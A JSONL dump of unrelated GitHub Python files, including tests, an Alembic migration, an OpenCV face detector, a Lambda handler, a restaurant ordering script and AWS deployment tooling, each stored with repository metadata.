tgt.race_year=src.race_year\"\nmerge_delta_data(final_df,\"f1_presentation\",\"constructor_standings\",presentation_folder_path,\"race_year\",merge_condition)\n\n# COMMAND ----------\n\n","repo_name":"Rupsa25/Formula1_Project","sub_path":"trans/3.constructor_standings.py","file_name":"3.constructor_standings.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"8315087485","text":"import pytest\nfrom pydantic import ValidationError\n\nfrom devmaua.src.enum.tipo_email import TipoEmail\n\nfrom devmaua.src.models.email import Email\n\nclass Test_Email():\n \n def test_create_instance_model(self):\n email = Email(email='teste@teste.com',\n tipo=TipoEmail.PRIVADO,\n prioridade = 1)\n assert email.email == 'teste@teste.com'\n assert email.tipo == TipoEmail.PRIVADO\n assert email.prioridade == 1\n \n def test_validator_error_email(self):\n with pytest.raises(ValidationError) as error_info:\n email = Email(email='teste@.teste.com',\n tipo=TipoEmail.PRIVADO,\n prioridade = 1)\n \n def test_criar_email_por_dict(self):\n d = {\n \"email\": \"teste@teste.com\",\n \"tipo\": 1,\n \"prioridade\": 1\n }\n \n email = Email.criarEmailPorDict(d)\n \n assert email.email == 'teste@teste.com'\n assert email.tipo == TipoEmail.PRIVADO\n assert email.prioridade == 1","repo_name":"Maua-Dev/models_devmaua","sub_path":"devmaua/test/models/test_email.py","file_name":"test_email.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"37065597665","text":"from random import randrange\nfrom src.chromosome import Chromosome\n\n\ndef initialisation(myChromosome): # done\n tempChromosome = myChromosome()\n for i in range(Chromosome.numTasks):\n tempChromosome.append(0)\n for j in range(len(Chromosome.data)):\n k = randrange(0, Chromosome.numProcs)\n tempChromosome[j] = k\n return tempChromosome\n","repo_name":"infiniator/NSGA","sub_path":"src/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"73294321803","text":"\"\"\"Add authorization code\n\nRevision ID: e5372087492f\nRevises: c90db4410eab\nCreate Date: 2023-08-23 00:01:10.260620\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e5372087492f'\ndown_revision = 'c90db4410eab'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('authorizationcodes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('expire_on', sa.DateTime(), nullable=True),\n sa.Column('client_id', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['client_id'], ['clients.client_id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_authorizationcodes_id'), 'authorizationcodes', ['id'], unique=False)\n op.create_table('authorizationcode_permission',\n sa.Column('authorization_code_id', sa.Integer(), nullable=False),\n sa.Column('permission_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['authorization_code_id'], ['authorizationcodes.id'], ),\n sa.ForeignKeyConstraint(['permission_id'], ['permissions.id'], ),\n sa.PrimaryKeyConstraint('authorization_code_id', 'permission_id')\n )\n op.alter_column('clients', 'client_id',\n existing_type=sa.VARCHAR(),\n nullable=False)\n op.drop_index('ix_clients_id', table_name='clients')\n op.drop_column('clients', 'id')\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('clients', sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False))\n op.create_index('ix_clients_id', 'clients', ['id'], unique=False)\n op.alter_column('clients', 'client_id',\n existing_type=sa.VARCHAR(),\n nullable=True)\n op.drop_table('authorizationcode_permission')\n op.drop_index(op.f('ix_authorizationcodes_id'), table_name='authorizationcodes')\n op.drop_table('authorizationcodes')\n # ### end Alembic commands ###\n","repo_name":"Binimow/authentiraptor","sub_path":"src/authorizationserver/backend/alembic/versions/e5372087492f_add_authorization_code.py","file_name":"e5372087492f_add_authorization_code.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"13630925683","text":"#Note : An Iterator is an object that contains a countable number of values .\n#Consists of 2 methods (__iter__ and __next__())\n\nlist1 = [1,2,3,4,5,6]\nlst = iter(list1)\nprint(next(lst))\nprint(next(lst))\nprint(next(lst))\nprint(next(lst))\n\n#Output\n'''\n1\n2\n3\n4\n'''\n#Stop after 10 iteration\nclass Numbers:\n def __iter__(self):\n self.a = 1\n return self\n\n def __next__(self):\n if self.a <= 10:\n x = self.a\n self.a += 1\n return x\n else:\n raise StopIteration\n\nobj1 = Numbers()\nmyiter = iter(obj1)\n\nfor x in myiter:\n print(x)\n\n#Output\n'''\n1\n2\n3\n4\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n'''","repo_name":"BrindaSahoo2020/Python-Programs","sub_path":"Iterator.py","file_name":"Iterator.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"39746656184","text":"# Multiplication table printer... 3rd attempt\n\ndef multi_table(b):\n\n for i in range(1, b+1):\n if b % 1 == 0:\n print('{0} x {1} = {2}'.format(a, i, a*i))\n\nif __name__ == '__main__':\n a = input('Enter a number: ')\n b = input('Enter a range: ')\n b = float(b)\n","repo_name":"mathewcmartin/wrksp","sub_path":"mlt_tbl.py","file_name":"mlt_tbl.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"2934264340","text":"from datetime import datetime # to get the current date and time\n\n\ndef log(log_message):\n \"\"\"\n - DOES: adds a log message \"log_message\" and its time stamp to a log file.\n \"\"\"\n\n # open the log file and make sure that it's closed properly at the end of the\n # block, even if an exception occurs:\n with open(\"log.txt\", \"a\") as log_file:\n # write the current time stamp and log message to logfile:\n log_file.write(datetime.strftime(datetime.today(),\n \"%Y-%m-%d %H:%M:%S\") + \": \" + log_message)\n log_file.write(\"\\n\") # (so the next message is put on a new line)\n\n","repo_name":"saikrishnarallabandi/compositionality-expts","sub_path":"01_captions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"64"} +{"seq_id":"1640573485","text":"#!/usr/bin/env python3\n\nimport json\nimport re\n\nimport requests\n\nfrom utils import update_feed\n\n\njson_feed = {\n 'version': 'https://jsonfeed.org/version/1.1',\n 'title': 'Denver Housing Justice News',\n 'home_page_url': 'https://sreynen.github.io/denver-housing-justice/',\n 'feed_url': 'https://sreynen.github.io/denver-housing-justice/feed.json',\n 'items': []\n}\n\nfilter_key_phrases = [\n 'house prices', 'housing',\n 'homeless', 'homelessness', 'unhoused',\n 'evict', 'eviction',\n 'rent',\n 'property tax', 'property taxes',\n 'living on city streets', 'living on the streets'\n]\nresponse = requests.get('https://sreynen.github.io/denver-news/feed.json')\nsource_json_feed = json.loads(response.text)\nfor item in source_json_feed.get('items'):\n match = False\n title_words = re.findall(r\"[\\w']+\", item.get('title', ''))\n title_substring = ' '.join([word.lower() for word in title_words]).lower()\n title_string = f\" {title_substring} \"\n for phrase in filter_key_phrases:\n phrase_string = f\" {phrase} \"\n if phrase_string in title_string:\n match = True\n if match:\n json_feed['items'].append(item)\n\nupdate_feed('./docs/feed.json', json_feed)\n","repo_name":"sreynen/denver-housing-justice","sub_path":"scrape_news.py","file_name":"scrape_news.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"44079458085","text":"import re\nf = open('../data/training_text')\n\nfor doc in f:\n # print(doc[:20])\n m = re.match(r'^\\d+\\|\\|(.*)$',doc)\n if m: \n content = m.group(1) \n sentences = content.split('.')\n for s in sentences:\n print(s.strip()) ","repo_name":"anachanpapa/AI-NLP-engineer-trial","sub_path":"scripts/OTHERS/doc2sentences.py","file_name":"doc2sentences.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"15825987121","text":"# Jing-Kai Lou (kaeaura@gamil.com)\n\nimport os\nimport sys\nsys.path.append('analyzer')\nimport matplotlib.pylab as plt\nfrom db import LiteDB\n\n\ndef load_data(path, file_dict):\n\tall_dbs = os.listdir(path)\n\tassert(set(all_filenames.values()).issubset(set(all_dbs)))\n\tdb = LiteDB()\n\tall_keynames = {}\n\tread_keynames = set()\n\tfor read_tracename, read_filename in all_filenames.iteritems():\n\t\tdb.load(os.path.join(path, read_filename))\n\t\tread_keyname = set(db.keys()).difference(read_keynames).pop()\n\t\tall_keynames.__setitem__(read_tracename, read_keyname)\n\t\tread_keynames.add(read_keyname)\n\treturn(db, all_keynames)\n\npowerlaw = lambda x, amp, index: amp * (x**index)\n\ndef insert_ks_table(db, keynames, save_path):\n\t\"\"\"docstring for insert_ks_table\"\"\"\n\tindeg_x_name = 'inDegDistr_x'\n\tindeg_y_name = 'inDegDistr_y'\n\tindeg_fit = 'inDegDistr_fit'\n\toutdeg_x_name = 'outDegDistr_x'\n\toutdeg_y_name = 'outDegDistr_y'\n\toutdeg_fit = 'outDegDistr_fit'\n\n","repo_name":"kaeaura/churn_prediction_proj","sub_path":"paper_tabler.py","file_name":"paper_tabler.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"64"} +{"seq_id":"2772194536","text":"# В целом надо все функции менять, тк сейчас используется update_or_create()\r\n# Он нам не подходит, тк он обновляет записи в базе данных без каких либо проверок\r\n# (пока переделал только update_or_create_post)\r\n#\r\n# Также, скорее всего, надо будет все методы изменить на bulk_create() и bulk_update()\r\n\r\n\r\nimport os\r\nimport time\r\n\r\nimport django\r\n\r\nfrom data.config import urls_for_update_db_data as urls\r\n\r\n\r\ndef setup_django():\r\n \"\"\"\r\n Настраивает Django\r\n\r\n При запуске HTTP сервера и выполнении команды Django это происходит автоматически\r\n \"\"\"\r\n os.environ.setdefault(\r\n \"DJANGO_SETTINGS_MODULE\",\r\n \"cool_posts_site.settings\"\r\n )\r\n django.setup()\r\n\r\n\r\ndef update_db_data():\r\n \"\"\"\r\n Обновляет записи в БД\r\n\r\n Доделать:\r\n добавить проверки на ошибки\r\n \"\"\"\r\n keys = {\r\n 'users': update_or_create_user,\r\n 'posts': update_or_create_post\r\n }\r\n\r\n while True:\r\n for key, url in urls.items():\r\n current_key_function = keys[key]\r\n data = get_json(url)\r\n\r\n for item in data:\r\n current_key_function(item)\r\n\r\n time.sleep(60 * 60) # Останавливает выполнение на 60 минут\r\n\r\n\r\nif __name__ == '__main__':\r\n setup_django()\r\n from utils.update_db_data.update_utils import get_json, update_or_create_user, update_or_create_post\r\n\r\n update_db_data()\r\n","repo_name":"Moussiao/Test-task","sub_path":"utils/update_db_data/update_db_data.py","file_name":"update_db_data.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"24533546797","text":"import utils.API_Responses as Responses\nimport utils.Dynamo as Dynamo\nfrom botocore.exceptions import ClientError\nimport pandas as pd\nimport plotly.figure_factory as ff\n\ndef handler(event, context):\n try:\n response = Dynamo.query(\n KeyConditionExpression=\"PK=:PK\",\n ExpressionAttributeValues={\n \":PK\": \"SOLUTION\",\n },\n Limit=1,\n ScanIndexForward=False\n )\n if 'Items' in response and len(response['Items']) > 0 and 'JSON' in response['Items'][0]:\n json = response['Items'][0]['JSON']\n if event['queryStringParameters'] is not None and event['queryStringParameters']['gantt'] != '1':\n return Responses._200(json)\n return {\n 'headers': {\n 'Content-Type': 'text/html',\n 'Access-Control-Allow-Methods': '*',\n 'Access-Control-Allow-Origin': '*',\n },\n 'statusCode': 200,\n 'body': create_html_gantt_from_json(json),\n }\n else:\n return Responses._204()\n except ClientError as e:\n return Responses._CustomResponse(e.response['Error']['Message'], e.response['ResponseMetadata']['HTTPStatusCode'])\n\ndef create_html_gantt_from_json(json):\n solution = pd.DataFrame(json)\n solution = solution[solution.IsPresent == True]\n fig = ff.create_gantt(solution, index_col='Part', show_colorbar=True, group_tasks=True)\n return fig.to_html(full_html=False)","repo_name":"SamBeNuts/TAS-planificateur-backend","sub_path":"endpoints/getSolution.py","file_name":"getSolution.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"22798790080","text":"import cv2\nimport numpy as np\n\n\nfrontal_face_cascade = cv2.CascadeClassifier(\"src\\cascades\\data\\haarcascade_frontalface_alt.xml\")\n\ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n\nwhile(True):\n ret,frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frontal_faces = frontal_face_cascade.detectMultiScale(gray, scaleFactor = 1.5, minNeighbors=5)\n for (x, y, w, h) in frontal_faces:\n print(x,y,w,h)\n roi_color = frame[y:y+h,x:x+w]\n cv2.imwrite(\"roi_color.png\", roi_color)\n\n color = (0, 0, 255)\n stroke = 2\n cv2.rectangle(frame, (x,y), (x+w, y+h), color, stroke)\n\n\n\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"yudenSU/face_recognition","sub_path":"src/face_detect_cascade.py","file_name":"face_detect_cascade.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"40109152584","text":"from argparse import Namespace\nfrom enum import Enum\nfrom typing import Any, Callable, Dict, List, Literal, Tuple, Type\n\nfrom bagualu.entrances.text_classification import GtsEngineInterfaceClfStd\nfrom gts_common.framework.base_gts_engine_interface import (\n TRAIN_MODE, BaseGtsEngineInterface, GtsEngineArgs)\nfrom gts_common.framework.classification_finetune import \\\n BaseInferenceManagerClf\nfrom gts_common.framework.classification_finetune.consts import \\\n InferenceManagerInputSample\nfrom gts_common.pipeline_utils import load_args, save_args\nfrom gts_common.registry import PIPELINE_REGISTRY\n\nmode_to_interface: Dict[TRAIN_MODE, BaseGtsEngineInterface] = {\n TRAIN_MODE.STD: GtsEngineInterfaceClfStd()\n}\n\n\n@PIPELINE_REGISTRY.register(suffix=__name__) # type: ignore\ndef train_pipeline(args: GtsEngineArgs):\n # save args\n args = save_args(args)\n train_mode = TRAIN_MODE(args.train_mode)\n module_factory = mode_to_interface[train_mode]\n module_factory.prepare_training(args)\n module_factory.generate_training_pipeline(args).main()\n\n\n@PIPELINE_REGISTRY.register(suffix=__name__) # type: ignore\ndef prepare_inference(save_path):\n args: GtsEngineArgs = load_args(save_path) # type: ignore\n train_mode = TRAIN_MODE(args.train_mode)\n module_factory = mode_to_interface[train_mode]\n return module_factory.generate_inference_manager(args)\n\n\n@PIPELINE_REGISTRY.register(suffix=__name__) # type: ignore\ndef inference(samples: List[Dict[str, Any]],\n inference_manager: BaseInferenceManagerClf):\n inf_sample_list = [\n InferenceManagerInputSample(text=sample[\"content\"])\n for sample in samples\n ]\n results = inference_manager.inference(inf_sample_list)\n return results\n","repo_name":"IDEA-CCNL/GTS-Engine","sub_path":"gts_engine/pipelines/bagualu_classification.py","file_name":"bagualu_classification.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"64"} +{"seq_id":"1254787204","text":"print('Bem vindo(a) à Feijoadinha Querida da Sayuri Takano') # Identificador Pessoal\r\n\r\n\r\ndef vol_feijoada(): # função do menu do volume da feijoada\r\n while True:\r\n print('Menu do volume da feijoada.')\r\n try:\r\n ml = int(input('Digite a quantidade desejada(ml): '))\r\n vol_valor = ml * 0.08\r\n if ml < 300 or ml > 5000:\r\n print(\r\n 'Não aceitamos porções menores que 300ml ou maiores que 5l! Tente novamente!') # verificação de input\r\n continue\r\n elif ml >= 300 or ml <= 5000:\r\n return vol_valor\r\n except ValueError: # verificação de input\r\n print('Você não digitou um número. Tente novamente!')\r\n\r\n\r\ndef opc_feijoada(): # função do menu da opção da feijoada\r\n while True:\r\n print('Menu da opção da feijoada.')\r\n print('b - Básica (Feijão + paiol + costelinha) ')\r\n print('p - Premium (Feijão + paiol + costelinha + partes de porco)')\r\n print('s - Suprema (Feijão + paiol + costelinha + partes do porco + charque + calabresa + bacon)')\r\n peso = str(input('Digite a opção desejada: '))\r\n if peso != 'b' and peso != 'p' and peso != 's': # verificação de input\r\n print('Você digitou uma opção que não existe. Tente novamente!')\r\n elif peso == 'b':\r\n peso_valor = 1.00\r\n return peso_valor\r\n elif peso == 'p':\r\n peso_valor = 1.25\r\n return peso_valor\r\n elif peso == 's':\r\n peso_valor = 1.50\r\n return peso_valor\r\n\r\n\r\ndef acomp_feijoada(): # função do menu do acompanhamento da feijoada\r\n tot_acomp = 0\r\n while True:\r\n try:\r\n print('Deseja mais algum acompanhamento?')\r\n print('0 - não desejo mais acompanhamentos (encerrar pedido)') # atendimento encerrado caso seja escolhido\r\n print('1 - 200g de arroz')\r\n print('2 - 150g de farofa especial')\r\n print('3 - 100g de couve cozida')\r\n print('4 - 1 laranja descascada')\r\n acomp = int(input('>> '))\r\n if acomp <= -1 or acomp >= 5: # verificação de input\r\n print('Não há um acompanhamento para o número escolhido. Tente novamente')\r\n continue\r\n if acomp == 1:\r\n acomp_valor = 5.00\r\n if acomp == 2:\r\n acomp_valor = 6.00\r\n if acomp == 3:\r\n acomp_valor = 7.00\r\n if acomp == 4:\r\n acomp_valor = 3.00\r\n if acomp == 0:\r\n return tot_acomp\r\n tot_acomp += acomp_valor\r\n except ValueError: # verificação de input\r\n print('Você não digitou um número. Tente novamente!')\r\n\r\n\r\nvolume_feijoada = vol_feijoada()\r\nopcao_feijoada = opc_feijoada()\r\nacompanha_feijoada = acomp_feijoada()\r\ntotal = (volume_feijoada * opcao_feijoada) + acompanha_feijoada # resultado da equação que a empresa cobra por feijoada\r\nprint('O total a ser pago é R$ %.2f. (volume = %.2f * opção = %.2f + acompanhamento = %.2f) ' % (total, volume_feijoada,\r\nopcao_feijoada, acompanha_feijoada))\r\n","repo_name":"SayuTKN/Atividade-phyton","sub_path":"Trabalho 1/Questão 3.py","file_name":"Questão 3.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"64"} +{"seq_id":"71485637003","text":"from aws_syncr.filename_completer import filename_prompt, setup_completer\nfrom aws_syncr.formatter import MergedOptionStringFormatter\nfrom aws_syncr.compat import input, string_types\nfrom aws_syncr.errors import AwsSyncrError\nfrom aws_syncr.errors import UserQuit\n\nfrom Crypto.Util import Counter\nfrom Crypto.Cipher import AES\n\nfrom option_merge import MergedOptions\nfrom textwrap import dedent\nimport itertools\nimport readline\nimport logging\nimport base64\nimport shlex\nimport yaml\nimport sys\nimport os\n\nlog = logging.getLogger(\"aws_syncr.actions\")\n\navailable_actions = {}\n\ndef an_action(func):\n available_actions[func.__name__] = func\n func.label = \"Default\"\n return func\n\ndef find_lambda_function(aws_syncr, configuration):\n lambda_function = aws_syncr.artifact\n\n if 'lambda' not in configuration:\n raise AwsSyncrError(\"Please define lambda functions under the 'lambda' section of your configuration\")\n\n if not lambda_function:\n available = list(configuration['lambda'].items.keys())\n raise AwsSyncrError(\"Please specify --artifact for the lambda function to deploy\", available=available)\n\n wanted = ['lambda', lambda_function]\n if wanted not in configuration:\n raise AwsSyncrError(\"Couldn't find specified lambda function\", available=list(configuration[\"lambda\"].items.keys()))\n\n return configuration['lambda'].items[lambda_function]\n\ndef find_gateway(aws_syncr, configuration):\n amazon = configuration['amazon']\n\n stage = aws_syncr.stage\n gateway = aws_syncr.artifact\n\n if 'apigateway' not in configuration:\n raise AwsSyncrError(\"Please define apigateway in your configuration before trying to deploy a gateway\")\n\n if not gateway:\n available = list(configuration['apigateway'].items.keys())\n raise AwsSyncrError(\"Please specify --artifact for the gateway function to deploy\", available=available)\n\n wanted = ['apigateway', gateway]\n if wanted not in configuration:\n raise AwsSyncrError(\"Couldn't find specified api gateway\", available=list(configuration[\"apigateway\"].items.keys()))\n gateway = configuration['apigateway'].items[gateway]\n\n if not stage:\n raise AwsSyncrError(\"Please specify --stage\", available=list(gateway.stage_names))\n\n return aws_syncr, amazon, stage, gateway\n\ndef find_certificate_source(configuration, gateway, certificate):\n source = configuration.source_for(['apigateway', gateway, 'domain_names'])\n location = [\"apigateway\", gateway, 'domain_names']\n domain_names = configuration.get(location, ignore_converters=True)\n\n for name, domain in domain_names.items():\n if 'zone' in domain:\n zone = MergedOptionStringFormatter(configuration, '.'.join(location + ['zone']), value=domain.get('zone')).format()\n domain_name = \"{0}.{1}\".format(name, zone)\n if domain_name == certificate:\n if 'certificate' not in domain:\n domain['certificate'] = {}\n\n var = domain['certificate']\n\n class StickyChain(object):\n def __init__(self):\n self.lst = []\n\n def __add__(self, other):\n self.lst.extend(other)\n return self.lst\n\n def __contains__(self, item):\n return item in self.lst\n\n def __getitem__(self, index):\n return self.lst[index]\n chain = StickyChain()\n\n if isinstance(var, string_types):\n result = MergedOptionStringFormatter(configuration, '.'.join(location), value=var, chain=chain).format()\n if not isinstance(result, dict) and not isinstance(result, MergedOptions) and (not hasattr(result, 'is_dict') or not result.is_dict):\n raise AwsSyncrError(\"certificate should be pointing at a dictionary\", got=result, chain=['.'.join(location)] + chain)\n\n location = chain[-1]\n source = configuration.source_for(location)\n for info in configuration.storage.get_info(location, ignore_converters=True):\n location = [str(part) for part in info.path.path]\n\n if source and type(source) is list:\n source = source[0]\n\n return location, source\n\n@an_action\ndef list_tasks(collector):\n \"\"\"List the available_tasks\"\"\"\n print(\"Usage: aws_syncr \")\n print(\"\")\n print(\"Available environments to choose from are\")\n print(\"-----------------------------------------\")\n print(\"\")\n for environment in os.listdir(collector.configuration_folder):\n location = os.path.join(collector.configuration_folder, environment)\n if os.path.isdir(location) and not environment.startswith(\".\"):\n print(\"\\t{0}\".format(environment))\n\n print(\"\")\n print(\"Available tasks to choose from are:\")\n print(\"-----------------------------------\")\n print(\"\")\n keygetter = lambda item: item[1].label\n tasks = sorted(available_actions.items(), key=keygetter)\n sorted_tasks = sorted(list(tasks), key=lambda item: len(item[0]))\n max_length = max(len(name) for name, _ in sorted_tasks)\n for key, task in sorted_tasks:\n desc = dedent(task.__doc__ or \"\").strip().split('\\n')[0]\n print(\"\\t{0}{1} :-: {2}\".format(\" \" * (max_length-len(key)), key, desc))\n print(\"\")\n\n@an_action\ndef sync(collector):\n \"\"\"Sync an environment\"\"\"\n amazon = collector.configuration['amazon']\n aws_syncr = collector.configuration['aws_syncr']\n\n # Convert everything before we try and sync anything\n log.info(\"Converting configuration\")\n converted = {}\n for thing in collector.configuration[\"__registered__\"]:\n if thing in collector.configuration:\n converted[thing] = collector.configuration[thing]\n\n # Do the sync\n for typ in collector.configuration[\"__registered__\"]:\n if typ in converted:\n thing = converted[typ]\n if not aws_syncr.artifact or aws_syncr.artifact == typ:\n log.info(\"Syncing {0}\".format(typ))\n for name, item in thing.items.items():\n thing.sync_one(aws_syncr, amazon, item)\n\n if not amazon.changes:\n log.info(\"No changes were made!!\")\n\n@an_action\ndef deploy_lambda(collector):\n \"\"\"Deploy a lambda function\"\"\"\n amazon = collector.configuration['amazon']\n aws_syncr = collector.configuration['aws_syncr']\n find_lambda_function(aws_syncr, collector.configuration).deploy(aws_syncr, amazon)\n\n@an_action\ndef test_lambda(collector):\n \"\"\"Invoke a lambda function with the defined sample_event and compare against desired_output_for_test\"\"\"\n amazon = collector.configuration['amazon']\n amazon._validated = True\n aws_syncr = collector.configuration['aws_syncr']\n if not find_lambda_function(aws_syncr, collector.configuration).test(aws_syncr, amazon):\n raise AwsSyncrError(\"Failed to test the lambda\")\n\n@an_action\ndef deploy_and_test_lambda(collector):\n \"\"\"Do a deploy of a lambda function followed by invoking it\"\"\"\n deploy_lambda(collector)\n test_lambda(collector)\n\n@an_action\ndef deploy_gateway(collector):\n \"\"\"Deploy the apigateway to a particular stage\"\"\"\n configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n aws_syncr, amazon, stage, gateway = find_gateway(aws_syncr, configuration)\n gateway.deploy(aws_syncr, amazon, stage)\n\n if not configuration['amazon'].changes:\n log.info(\"No changes were made!!\")\n\n@an_action\ndef sync_and_deploy_gateway(collector):\n \"\"\"Do a sync followed by deploying the gateway\"\"\"\n configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n find_gateway(aws_syncr, configuration)\n\n artifact = aws_syncr.artifact\n aws_syncr.artifact = \"\"\n sync(collector)\n\n aws_syncr.artifact = artifact\n deploy_gateway(collector)\n\n@an_action\ndef test_gateway(collector):\n \"\"\"Specify after -- from the commandline and that gateway endpoint will be requested\"\"\"\n collector.configuration['amazon']._validated = True\n configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n aws_syncr, amazon, stage, gateway = find_gateway(aws_syncr, configuration)\n if not gateway.test(aws_syncr, amazon, stage):\n raise AwsSyncrError(\"Failed to test the gateway\")\n\n@an_action\ndef test_all_gateway_endpoints(collector):\n \"\"\"Do a test on all the available gateway endpoints\"\"\"\n collector.configuration['amazon']._validated = True\n configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n aws_syncr, amazon, stage, gateway = find_gateway(aws_syncr, configuration)\n\n failure = False\n for method, resource in gateway.available_methods_and_endpoints():\n combination = \"{0} {1}\".format(method, resource)\n print(combination)\n print(\"=\" * len(combination))\n aws_syncr.extra = combination\n if not gateway.test(aws_syncr, amazon, stage):\n failure = True\n print(\"\")\n\n if failure:\n raise AwsSyncrError(\"Atleast one of the endpoints failed the test\")\n\n@an_action\ndef encrypt_certificate(collector):\n \"\"\"Write encrypted values for your certificate to the configuration\"\"\"\n configuration = collector.configuration\n amazon = configuration['amazon']\n aws_syncr = configuration['aws_syncr']\n certificate = aws_syncr.artifact\n\n available = []\n\n for gateway_name, gateway in configuration.get('apigateway', {}, ignore_converters=True).items():\n for name, options in gateway.get(\"domain_names\", {}).items():\n if \"zone\" in options:\n location = '.'.join(['apigateway', gateway_name, 'domain_names'])\n formatter = MergedOptionStringFormatter(configuration, location, value=options['zone'])\n available.append((gateway_name, \"{0}.{1}\".format(name, formatter.format())))\n\n if not available:\n raise AwsSyncrError(\"Please specify apigateway..domain_names..name in the configuration\")\n\n if not certificate:\n raise AwsSyncrError(\"Please specify certificate to encrypt with --artifact\", available=[a[1] for a in available])\n\n if certificate not in [a[1] for a in available]:\n raise AwsSyncrError(\"Unknown certificate\", available=[a[1] for a in available], got=certificate)\n\n gateway = [name for name, cert in available if cert == certificate][0]\n location, source = find_certificate_source(configuration, gateway, certificate)\n\n log.info(\"Gonna edit {0} in {1}\".format(location, source))\n current = MergedOptions.using(yaml.load(open(source)))\n dest = current[location]\n\n try:\n key_id = input(\"Which kms key do you want to use? \")\n region = input(\"What region is this key in? \")\n except EOFError:\n raise UserQuit()\n\n # Make the filename completion work\n setup_completer()\n\n # Create the datakey to encrypt with\n data_key = amazon.kms.generate_data_key(region, key_id)\n plaintext_data_key = data_key[\"Plaintext\"]\n encrypted_data_key = base64.b64encode(data_key[\"CiphertextBlob\"]).decode('utf-8')\n\n # Encrypt our secrets\n secrets = {}\n for name, desc in ((\"body\", \"certificate's crt file\"), (\"key\", \"private key file\"), (\"chain\", \"certificate chain\")):\n location = None\n while not location or not os.path.isfile(location):\n location = os.path.expanduser(filename_prompt(\"Where is the {0}? \".format(desc)))\n if not location or not os.path.isfile(location):\n print(\"Please give a location to a file that exists!\")\n\n with open(location, 'rb') as fle:\n data = fle.read()\n\n counter = Counter.new(128)\n encryptor = AES.new(plaintext_data_key[:32], AES.MODE_CTR, counter=counter)\n secrets[name] = base64.b64encode(encryptor.encrypt(data)).decode('utf-8')\n\n # Add in the encrypted values\n dest['body'] = {\"kms\": secrets['body'], \"location\": region, \"kms_data_key\": encrypted_data_key}\n dest['key'] = {\"kms\": secrets['key'], \"location\": region, \"kms_data_key\": encrypted_data_key}\n dest['chain'] = {\"kms\": secrets['chain'], \"location\": region, \"kms_data_key\": encrypted_data_key}\n\n # And write to the file!\n yaml.dump(current.as_dict(), open(source, 'w'), explicit_start=True, indent=2, default_flow_style=False)\n\n@an_action\ndef execute_as(collector):\n \"\"\"Execute a command (after the --) as an assumed role (specified by --artifact)\"\"\"\n # Gonna assume role anyway...\n collector.configuration['amazon']._validated = True\n\n # Find the arn we want to assume\n account_id = collector.configuration['accounts'][collector.configuration['aws_syncr'].environment]\n arn = \"arn:aws:iam::{0}:role/{1}\".format(account_id, collector.configuration['aws_syncr'].artifact)\n\n # Determine the command to run\n parts = shlex.split(collector.configuration[\"aws_syncr\"].extra)\n if not parts:\n suggestion = \" \".join(sys.argv) + \" -- /path/to/command_to_run\"\n msg = \"No command was provided. Try something like:\\n\\t\\t{0}\".format(suggestion)\n raise AwsSyncrError(msg)\n\n # Get our aws credentials environment variables from the assumed role\n env = dict(os.environ)\n env.update(collector.configuration['amazon'].iam.assume_role_credentials(arn))\n\n # Turn into the command we want to execute\n os.execvpe(parts[0], parts, 